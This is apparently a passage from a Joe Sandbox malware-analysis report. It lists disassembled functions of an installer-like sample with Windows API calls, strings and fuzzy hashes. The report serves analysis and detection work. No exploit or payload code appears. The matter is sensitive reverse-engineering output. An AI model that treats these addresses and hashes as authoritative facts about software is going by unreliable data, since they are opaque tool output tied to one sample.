                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorHandleLastProcess
                                                                                • String ID: D$x^I
                                                                                • API String ID: 3798668922-903578107
                                                                                • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                Function 00478608 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • GetFocus.USER32 ref: 00478673
                                                                                • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessageStateTextWaitWindow
                                                                                • String ID: Wnd=$%x
                                                                                • API String ID: 1381870634-2927251529
                                                                                • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                Function 0046E8B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$LocalSystem
                                                                                • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                • API String ID: 1748579591-1013271723
                                                                                • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                                • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                                Function 00453F62 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesDeleteErrorLastMove
                                                                                • String ID: DeleteFile$MoveFile
                                                                                • API String ID: 3024442154-139070271
                                                                                • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                                • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                                Function 00483644 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                                • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                                Strings
                                                                                • CSDVersion, xrefs: 0048367C
                                                                                • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                • API String ID: 3677997916-1910633163
                                                                                • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                Function 004596C8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                • API String ID: 47109696-2631785700
                                                                                • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                                Function 0042D900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                • API String ID: 1646373207-4063490227
                                                                                • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                                Function 0042EB64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                • API String ID: 1646373207-260599015
                                                                                • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                                • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                                Function 0044F754 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                • API String ID: 1646373207-597752486
                                                                                • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                                • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                                Function 00498338 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                • API String ID: 1646373207-834958232
                                                                                • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                                • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                                Function 00464960 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2238633743-2683653824
                                                                                • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                                • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                                                Function 0047D334 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                                • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                                • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                                Function 0047581C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                                  • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CountErrorFileLastMoveTick
                                                                                • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                • API String ID: 2406187244-2685451598
                                                                                • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                                                • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                                                Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00413D56
                                                                                • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                  • Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                                  • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                                • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CursorDesktopWindow$Show
                                                                                • String ID:
                                                                                • API String ID: 2074268717-0
                                                                                • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                                                • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                                                Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
